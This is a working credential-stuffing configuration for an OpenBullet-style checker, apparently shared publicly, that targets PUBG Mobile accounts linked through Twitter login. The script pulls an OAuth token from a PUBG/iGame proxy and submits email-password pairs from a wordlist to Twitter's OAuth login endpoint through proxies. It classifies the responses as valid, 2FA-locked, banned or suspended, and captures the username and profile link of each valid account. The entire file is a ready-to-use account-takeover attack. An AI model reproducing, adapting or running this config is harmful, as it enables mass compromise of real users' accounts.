[SETTINGS]
{
  "Name": "PubgMobile [ Twitter ]",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2022-04-13T18:30:11.9595906+04:30",
  "AdditionalInfo": "#Publiced_Thanks_For_Use",
  "RequiredPlugins": [],
  "Author": "@Ma3TerMpk / @Lord_Nexer / @CyberBoyCZX",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "Default",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "PubgMobile [ Twitter ]",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#REQ REQUEST GET "https://sgp-jsproxy.igamecj.com/jsproxy?action=token&call_back=https://cdn.itopsdk.com/v1/na-igame/jssdk/twitterloginSuccess.html?gameid=1321&iGameId=1321" 
  
  HEADER "Host: sgp-jsproxy.igamecj.com" 
  HEADER "Origin: https://cdn.itopsdk.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148" 
  HEADER "Accept-Language: fr-fr" 
  HEADER "Referer: https://cdn.itopsdk.com/" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

#Token PARSE "<SOURCE>" JSON "oauth_token" -> VAR "oauth_token" 

#Token PARSE "<SOURCE>" JSON "oauth_token_secret" -> VAR "oauth_token_secret" 

#REQ REQUEST GET "https://api.twitter.com/oauth/authenticate?oauth_token=<oauth_token>" 
  
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Token PARSE "<SOURCE>" LR "name=\"authenticity_token\" type=\"hidden\" value=\"" "\">" -> VAR "authenticity_token" 

#REQ REQUEST POST "https://api.twitter.com/oauth/authenticate" 
  CONTENT "authenticity_token=<authenticity_token>&redirect_after_login=https%3A%2F%2Fapi.twitter.com%2Foauth%2Fauthenticate%3Foauth_token%3D<oauth_token>&oauth_token=<oauth_token>&session%5Busername_or_email%5D=<USER>&session%5Bpassword%5D=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: api.twitter.com" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Origin: https://api.twitter.com" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148" 
  HEADER "Referer: https://api.twitter.com/oauth/authenticate?oauth_token=<oauth_token>" 
  HEADER "Content-Length: 1004" 
  HEADER "Accept-Language: en-en" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Redirecting you back to the application" 
  KEYCHAIN Failure OR 
    KEY "The email and password you entered did not match our records" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Log in with authentication app" 
    KEY "<ADDRESS>" Contains "https://api.twitter.com/account/login_verification" 
    KEY "Verify your identity" 
    KEY "Help us keep your account safe" 
  KEYCHAIN Ban OR 
    KEY "<ADDRESS>" Contains "https://twitter.com/login?email_disabled=true" 
  KEYCHAIN Custom "SUSPENDED" OR 
    KEY "This account is suspended" 

#Username PARSE "<SOURCE>" LR "class=\"name\">" "</" -> VAR "Twitter Username" 

#AccountLink FUNCTION Constant "https://twitter.com/<Twitter Username>" -> CAP "Twitter Account Link" 

#Auther FUNCTION Constant "@Ma3TerMpk / @Lord_Nexer / @CyberBoyCZX" -> CAP "Auther" 

